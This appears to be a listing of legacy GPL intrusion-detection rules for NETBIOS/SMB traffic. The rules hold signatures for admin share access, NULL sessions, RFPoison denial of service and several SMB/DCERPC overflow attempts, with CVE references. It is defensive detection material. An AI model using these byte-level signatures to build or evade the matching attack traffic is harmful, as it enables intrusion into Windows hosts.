Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103394

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB ISystemActivator little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103394; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB ISystemActivator little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103395

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB ISystemActivator unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103395; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB ISystemActivator unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103242

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB irot unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"`|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?"; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103242; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB irot unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103243

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB irot unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"`|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?"; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103243; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB irot unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103100

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103100; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103091

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc unicode create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|5C 00|l|00|l|00|s|00|r|00|p|00|c|00 00 00|"; within:16; distance:78; nocase; classtype:protocol-command-decode; sid:2103091; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc unicode create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103101

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103101; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102938

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NDdeSetTrustedShareW overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0C|"; within:2; distance:19; isdataat:256,relative; content:!"|00|"; within:256; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102938; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NDdeSetTrustedShareW overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102949

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NDdeSetTrustedShareW unicode little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0C 00|"; within:2; distance:19; isdataat:512,relative; content:!"|00 00|"; within:512; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102949; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NDdeSetTrustedShareW unicode little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103168

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS msqueue bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103168; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS msqueue bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103169

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS msqueue little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103169; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS msqueue little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100538

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IPC$ unicode share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,&,128,6,relative; byte_jump:2,34,little,relative; content:"I|00|P|00|C|00 24 00 00 00|"; distance:2; nocase; flowbits:set,smb.tree.connect.ipc; classtype:protocol-command-decode; sid:2100538; rev:17; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IPC$ unicode share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 17

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100537

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IPC$ share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,!&,128,6,relative; byte_jump:2,34,little,relative; content:"IPC|24 00|"; distance:2; nocase; flowbits:set,smb.tree.connect.ipc; classtype:protocol-command-decode; sid:2100537; rev:17; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IPC$ share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 17

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100536

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB D$ share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,!&,128,6,relative; byte_jump:2,34,little,relative; content:"D|24 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2100536; rev:13; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB D$ share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 13

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100535

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CD..."; flow:to_server,established; content:"|5C|...|00 00 00|"; reference:arachnids,337; classtype:attempted-recon; sid:2100535; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CD...

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-recon

URL reference : arachnids,337

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100534

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CD.."; flow:to_server,established; content:"|5C|../|00 00 00|"; reference:arachnids,338; classtype:attempted-recon; sid:2100534; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CD..

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-recon

URL reference : arachnids,338

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100533

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB C$ share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,!&,128,6,relative; byte_jump:2,34,little,relative; content:"C|24 00|"; distance:2; nocase; content:!"IPC|24 00|"; within:5; distance:-5; nocase; classtype:protocol-command-decode; sid:2100533; rev:17; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB C$ share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 17

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100532

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB ADMIN$ share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,!&,128,6,relative; byte_jump:2,34,little,relative; content:"ADMIN|24 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2100532; rev:14; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB ADMIN$ share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 14

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100530

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS NT NULL session"; flow:to_server,established; content:"|00 00 00 00|W|00|i|00|n|00|d|00|o|00|w|00|s|00| |00|N|00|T|00| |00|1|00|3|00|8|00|1"; reference:arachnids,204; reference:bugtraq,1163; reference:cve,2000-0347; classtype:attempted-recon; sid:2100530; rev:11; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : NT NULL session

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-recon

URL reference : arachnids,204|bugtraq,1163|cve,2000-0347

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 11

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100529

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS DOS RFPoison"; flow:to_server,established; content:"|5C 00 5C 00|*|00|S|00|M|00|B|00|S|00|E|00|R|00|V|00|E|00|R|00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 FF FF FF FF 00 00 00 00|"; reference:arachnids,454; classtype:attempted-dos; sid:2100529; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DOS RFPoison

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-dos

URL reference : arachnids,454

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102382

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB Session Setup NTMLSSP asn1 overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBs"; within:5; distance:3; byte_test:1,!&,128,6,relative; pcre:"/^.{27}/R"; byte_test:4,&,2147483648,21,relative,little; content:!"NTLMSSP"; within:7; distance:27; asn1:double_overflow, bitstring_overflow, relative_offset 27, oversize_length 2048; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12065; reference:url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx; classtype:protocol-command-decode; sid:2102382; rev:22; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Session Setup NTMLSSP asn1 overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,9633|bugtraq,9635|cve,2003-0818|nessus,12052|nessus,12065|url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 22

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102383

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS Session Setup NTMLSSP asn1 overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBs"; within:5; distance:3; byte_test:1,!&,128,6,relative; byte_test:4,&,2147483648,48,relative,little; content:!"NTLMSSP"; within:7; distance:54; asn1:double_overflow, bitstring_overflow, relative_offset 54, oversize_length 2048; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12065; reference:url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx; classtype:protocol-command-decode; sid:2102383; rev:21; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Session Setup NTMLSSP asn1 overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,9633|bugtraq,9635|cve,2003-0818|nessus,12052|nessus,12065|url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 21

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103003

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS Session Setup NTMLSSP unicode asn1 overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBs"; within:5; distance:3; byte_test:1,&,128,6,relative; byte_test:4,&,2147483648,48,relative,little; content:!"NTLMSSP"; within:7; distance:54; asn1:double_overflow, bitstring_overflow, relative_offset 54, oversize_length 2048; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12065; reference:url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx; classtype:protocol-command-decode; sid:2103003; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Session Setup NTMLSSP unicode asn1 overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,9633|bugtraq,9635|cve,2003-0818|nessus,12052|nessus,12065|url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102403

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB Session Setup AndX request unicode username overflow attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMBs"; within:5; distance:3; byte_test:1,&,128,6,relative; pcre:"/^.{27}/sR"; byte_test:4,!&,2147483648,21,relative,little; content:!"|00 00|"; within:510; distance:29; reference:bugtraq,9752; reference:url,www.eeye.com/html/Research/Advisories/AD20040226.html; classtype:protocol-command-decode; sid:2102403; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Session Setup AndX request unicode username overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,9752|url,www.eeye.com/html/Research/Advisories/AD20040226.html

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102404

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS Session Setup AndX request unicode username overflow attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"s"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_test:4,!&,2147483648,21,relative,little; content:!"|00 00|"; within:510; distance:29; reference:bugtraq,9752; reference:url,www.eeye.com/html/Research/Advisories/AD20040226.html; classtype:protocol-command-decode; sid:2102404; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Session Setup AndX request unicode username overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,9752|url,www.eeye.com/html/Research/Advisories/AD20040226.html

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103437

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile andx attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 04|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6; classtype:protocol-command-decode; sid:2103437; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103429

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile andx attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 04|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6; classtype:protocol-command-decode; sid:2103429; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103158

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC CoGetInstanceFromFile little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|05|"; depth:1; byte_test:1,&,16,3,relative; content:"|00|"; offset:1; depth:1; content:"|01 00|"; distance:19; within:2; byte_test:4,>,128,20,relative,little; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103158; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC CoGetInstanceFromFile little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

